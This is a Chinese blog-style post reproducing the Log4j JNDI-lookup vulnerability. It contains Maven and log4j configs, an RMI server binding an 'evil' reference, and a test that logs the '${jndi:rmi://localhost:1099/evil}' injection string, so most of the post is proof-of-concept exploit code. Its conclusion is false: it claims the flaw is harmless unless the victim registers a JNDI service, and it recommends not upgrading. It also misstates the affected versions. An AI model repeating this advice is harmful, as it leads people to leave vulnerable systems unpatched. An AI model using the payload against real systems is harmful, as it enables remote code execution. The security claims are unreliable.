去年,log4j被爆出了一个漏洞,说可以通过利用日志格式化中的远程注入控制主机。当时,这个漏洞被形容为史诗级漏洞,因为这个远程操作可以执行一些操作,如果这个操作有恶意,那么就可以干任何事情,其实有点唬人。
log4j影响的版本是>2.0并且<2.14.1。
下面简单复现一下这个漏洞:
pom.xml
- <dependency>
- <groupId>org.apache.logging.log4jgroupId>
- <artifactId>log4j-coreartifactId>
- <version>2.14.0version>
- dependency>
log4j2.xml
- "1.0" encoding="UTF-8"?>
- <Configuration xmlns="http://logging.apache.org/log4j/2.0/config">
- <Appenders>
- <Console name="Console" target="SYSTEM_OUT">
- <PatternLayout pattern="%d{HH:mm:ss.SSS} [%t] %-5level %logger{36} - %msg%n">PatternLayout>
- Console>
- Appenders>
- <Loggers>
- <Root level="info">
- <AppenderRef ref="Console">AppenderRef>
- Root>
- Loggers>
- Configuration>
Hallo.java
- package log4j2;
-
- public class Hallo {
- static {
- System.out.println("莫名奇妙被执行。。。");
- }
- }
Log4jServer.java
- package log4j2;
-
- import com.sun.jndi.rmi.registry.ReferenceWrapper;
- import javax.naming.Reference;
- import java.rmi.registry.LocateRegistry;
- import java.rmi.registry.Registry;
- public class Log4jServer {
- public static void main(String[] args){
- try {
- Registry registry = LocateRegistry.createRegistry(1099);
- Reference reference = new Reference("log4j2.Hallo","log4j2.Hallo",null);
- ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
- registry.bind("evil",referenceWrapper);
- }catch (Exception e){
- e.printStackTrace();
- }
- }
- }
这个程序,开启一个rmi服务,绑定了Hallo类,对外暴露的远程服务是:jndi:rmi://localhost:1099/evil。当远程客户端调用这个服务,Hallo类就被初始化,并执行static代码块中的打印功能。
Log4jTest.java
- package log4j2;
-
- import org.apache.logging.log4j.LogManager;
- import org.apache.logging.log4j.Logger;
-
- public class Log4jTest {
- private static final Logger LOGGER = LogManager.getLogger(Log4jTest.class);
-
- public static void main(String[] args) {
- //System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase","true");
- String name = "${jndi:rmi://localhost:1099/evil}";
- String osinfo = "${java:os}";
- LOGGER.error("hello,{}",name);
- }
- }
先启动远程服务类Log4jServer,然后运行Log4jTest,控制台打印如下:
如果不开启Log4jServer,直接运行Log4jTest:
从上面的打印结果来看,我们在客户端里面其实就是想输出日志,但是我们通过一些表达式,比如:LOGGER.error("hello,{}","${jndi:rmi://localhost:1099/evil}")来拼接日志信息,日志会进行格式化,在格式化的时候,会查找一些lookup,这里面有如下的lookup:
正好就有jdni这个lookup,所以这里示例最后就根据表达式执行rmi操作。
还可以试试upper格式化操作:
经过上面演示的这个jndi日志格式化,我们似乎可以模拟出一个远程操作的漏洞,然后这个漏洞就被人形容很危险,其实如果你用了apache log4j的这些低版本,但是你没有注册jndi服务,黑客再怎么牛逼,也无法攻击你。
做IT的,尤其是一线开发,对这个问题,我似乎觉着它不严重,根本不用担心,很多人觉着远程漏洞就可以入侵计算机,然后执行任意操作,其实都是夸张的说法,上面的过程,我们很清楚,最终我们只能调起evil这个服务,这个服务是我们自己编码的,完全可以自己控制,所以安全问题压根不存在。所以我也不推荐升级,完全没必要,知道怎么回事就行了。